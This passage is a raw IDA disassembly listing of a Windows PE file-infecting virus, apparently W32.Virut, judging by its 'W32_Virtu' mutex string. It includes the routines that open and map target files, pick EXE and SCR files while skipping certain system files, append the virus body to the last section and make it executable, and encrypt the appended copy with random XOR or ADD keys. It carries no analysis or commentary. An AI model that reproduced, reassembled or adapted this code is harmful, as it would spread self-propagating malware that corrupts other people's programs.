and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3090901C
; ---------------------------------------------------------------------------
loc_30908FE0: ; CODE XREF: sub_30908FA2-7F�j
; sub_30908FA2-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3090901C: ; CODE XREF: sub_30908FA2+3C�j
pop edi
pop esi
retn
sub_30908FA2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3090901F proc near ; CODE XREF: UPX2:309091ED�p
; sub_30909215+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_309090F0
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_309090F0
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_309095A8
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3090959C
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3090959C
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3090959C
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_30909574
mov [ebp+403972h], eax
locret_309090F0: ; CODE XREF: sub_3090901F+10�j
; sub_3090901F+27�j ...
retn
sub_3090901F endp
; =============== S U B R O U T I N E =======================================
sub_309090F1 proc near ; CODE XREF: sub_30909215+117�p
; sub_30909215+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3090910B
add eax, [ebp+40106Dh]
loc_3090910B: ; CODE XREF: sub_309090F1+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_309090F1 endp
; =============== S U B R O U T I N E =======================================
sub_30909136 proc near ; CODE XREF: sub_30909215:loc_30909264�p
; sub_30909215+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3090913B: ; CODE XREF: sub_30909136+23�j
jecxz short locret_30909172
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_30909172
cmp dword ptr [edx+0Ch], 1
jb short loc_3090913B
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_30909172: ; CODE XREF: sub_30909136:loc_3090913B�j
; sub_30909136+1D�j ...
retn
sub_30909136 endp
; =============== S U B R O U T I N E =======================================
sub_30909173 proc near ; CODE XREF: UPX2:309091FF�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_30909173 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_30909180: ; CODE XREF: UPX2:309091A1�j
mov ecx, edi
jmp short loc_3090918F
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3090918B: ; CODE XREF: UPX2:3090919D�j
mov ebx, edi
xor ecx, ecx
loc_3090918F: ; CODE XREF: UPX2:30909182�j
; UPX2:309091A5�j
lodsb
cmp al, 61h
jb short loc_3090919A
cmp al, 7Ah
ja short loc_3090919A
sub al, 20h
loc_3090919A: ; CODE XREF: UPX2:30909192�j
; UPX2:30909196�j
stosb
cmp al, 5Ch
jz short loc_3090918B
cmp al, 2Eh
jz short loc_30909180
cmp al, 0
jnz short loc_3090918F
jecxz short locret_30909172
mov eax, [ecx]
cmp eax, 455845h
jz short loc_309091BD
cmp eax, 524353h
jnz locret_309090F0
loc_309091BD: ; CODE XREF: UPX2:309091B0�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_309090F0
cmp eax, 4E554357h
jz locret_309090F0
cmp eax, 32334357h
jz locret_309090F0
cmp eax, 4F545350h
jz locret_309090F0
xor ebx, ebx
call sub_3090901F
jz locret_309090F0
xor edx, edx
call sub_30909215
call sub_30909173
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_30909552
; =============== S U B R O U T I N E =======================================
sub_30909215 proc near ; CODE XREF: UPX2:309091FA�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_30909552
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_30909552
test dword ptr [ebx+16h], 2000h
jnz loc_30909552
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_30909552
jecxz short loc_30909264
cmp ecx, 101h
jbe loc_30909552
loc_30909264: ; CODE XREF: sub_30909215+41�j
call sub_30909136
jb loc_30909552
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_30907D6E
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3090928E: ; CODE XREF: sub_30909215+92�j
push 20h
dec cl
pop eax
js short loc_309092A9
call sub_30907D6E
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3090928E
; ---------------------------------------------------------------------------
loc_309092A9: ; CODE XREF: sub_30909215+7E�j
; sub_30909215+CD�j ...
push 6
pop ecx
loc_309092AF: ; CODE XREF: sub_30909215+B8�j
push 6
pop eax
call sub_30907D6E
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_309092AF
test dword ptr [ebp+403431h], 8
jnz short loc_309092E4
cmp byte ptr [ebp+40342Bh], 1
jz short loc_309092A9
loc_309092E4: ; CODE XREF: sub_30909215+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3090930B
cmp byte ptr [ebp+403429h], 5
jz short loc_309092A9
cmp byte ptr [ebp+40342Ah], 5
jz short loc_309092A9
cmp byte ptr [ebp+40342Bh], 5
jz short loc_309092A9
loc_3090930B: ; CODE XREF: sub_30909215+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_30909320
cmp byte ptr [ebp+403429h], 2
ja short loc_309092A9
loc_30909320: ; CODE XREF: sub_30909215+100�j
and dword ptr [ebp+4039AEh], 0
call loc_309087BB
call sub_309090F1
call sub_3090955B
mov ebx, [ebp+403976h]
call sub_3090901F
jz loc_30909552
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_30909136
jb loc_30909552
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_30909388
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_30909388: ; CODE XREF: sub_30909215+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3090939C
rep movsb
loc_3090939C: ; CODE XREF: sub_30909215+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_30909454
push dword ptr [ebx+28h]
call sub_30908523
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_30909454
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_309093D9
xor ecx, ecx
loc_309093D9: ; CODE XREF: sub_30909215+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_30909440
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_30909419
neg dword ptr [eax]
loc_30909419: ; CODE XREF: sub_30909215+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_30909437
neg dword ptr [eax]
loc_30909437: ; CODE XREF: sub_30909215+21E�j
push ecx
call sub_309090F1
pop ecx
jmp short loc_3090944C
; ---------------------------------------------------------------------------
loc_30909440: ; CODE XREF: sub_30909215+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3090944C: ; CODE XREF: sub_30909215+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_30909454: ; CODE XREF: sub_30909215+191�j
; sub_30909215+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3090946D
imul edx, 12345678h
loc_3090946D: ; CODE XREF: sub_30909215+250�j
mov [eax-1], dl
call near ptr dword_30907428+19h
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3090949E
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3090949E: ; CODE XREF: sub_30909215+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_309094C3
push edx
call sub_30908DE9
pop edx
loc_309094C3: ; CODE XREF: sub_30909215+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_309094CE
mov [ebx+28h], ecx
loc_309094CE: ; CODE XREF: sub_30909215+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_309094DF
mov [edx+8], ecx
loc_309094DF: ; CODE XREF: sub_30909215+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_30909510
add ecx, [ebp+40106Dh]
loc_30909510: ; CODE XREF: sub_30909215+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_30909532
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_30909532
mov dh, [ebp+403430h]
loc_30909532: ; CODE XREF: sub_30909215+307�j
; sub_30909215+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_30909549
loc_3090953E: ; CODE XREF: sub_30909215+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3090953E
jmp short loc_30909552
; ---------------------------------------------------------------------------
loc_30909549: ; CODE XREF: sub_30909215+327�j
; sub_30909215+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_30909549
loc_30909552: ; CODE XREF: UPX2:30909210�j
; sub_30909215+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_30909215 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3090955B proc near ; CODE XREF: sub_30909215+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_309090F0
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_30909574: ; CODE XREF: sub_3090901F+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3090959C: ; CODE XREF: sub_3090901F+6B�j
; sub_3090901F+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_309095A8: ; CODE XREF: sub_3090901F+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3090955B endp
; ---------------------------------------------------------------------------
db 0E8h
align 8
dd 81016A5Dh, 403349EDh, 0FF05800h, 158085C1h, 0C0850040h
dd 0FFC883C3h, 85C10FF0h, 401580h, 103DC3h, 1C75002Ah
dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FB7EE805h
dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
dd 3975FFFFh, 3024448Bh, 384EB58Dh, 508B0040h, 3A816608h
dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 35F895FFh
dd 0C4830040h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFB2BE8h
dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 10E8h
dd 20C200h, 30B8h, 3E800h, 24C20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 13ED811Ah
dd 0E8004034h, 0FFFFE539h, 4C261h, 1060502h, 45950703h
dd 1CFBC580h, 119415FFh, 5B900100h, 59E8h, 24648B00h, 4EBB808h
dd 0FAEB0000h, 18A16764h, 30408B00h, 240B60Fh, 7500F883h
dd 0E83Ch, 815D0000h, 402320EDh, 67858B00h, 3004023h, 85h
dd 31h dup(0)
dd 47000000h, 0AD7C809Bh, 317C8308h, 0A07C9103h, 7C80ADh
dd 2 dup(0)
dd 0B6000000h, 247C80BDh, 5C7C801Ah, 677C8094h, 2C7C8023h
dd 377C8104h, 0F7C8106h, 587C864Bh, 0EC7C80C0h, 3C7C80E7h
dd 777C8115h, 457C810Ah, 0A17C831Ch, 0FF7C80B6h, 0CA7C8608h
dd 0DA7C835Dh, 0DE7C8111h, 777C812Ah, 57C801Dh, 767C80B9h
dd 0E17C80BBh, 0E57C8309h, 587C863Dh, 827C863Fh, 0B87C8127h
dd 427C831Ch, 1C7C8024h, 747C810Bh, 517C80B9h, 877C809Ah
dd 607C810Dh, 827C90D4h, 547C90D6h, 697C90D7h, 937C90D7h
dd 557C90D7h, 0FD7C90DCh, 907C90DCh, 0B67C90DDh, 327C90DEh
dd 0C67C90EAh, 7C9130h, 15h dup(0)
a68:
unicode 0, <68>
dw 98D8h
aR0 db '0\',0
aB db 'B',0
aAsenamedobject:
unicode 0, <aseNamedObjects\W32_Virtu>,0
dd 0BBh dup(0)
dd 7900h, 0Ch dup(0)
dd 0FDF00000h, 7Fh, 18F2h dup(0)
UPX2 ends
; Section 4. (virtual address 00010000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00010000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 30910000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start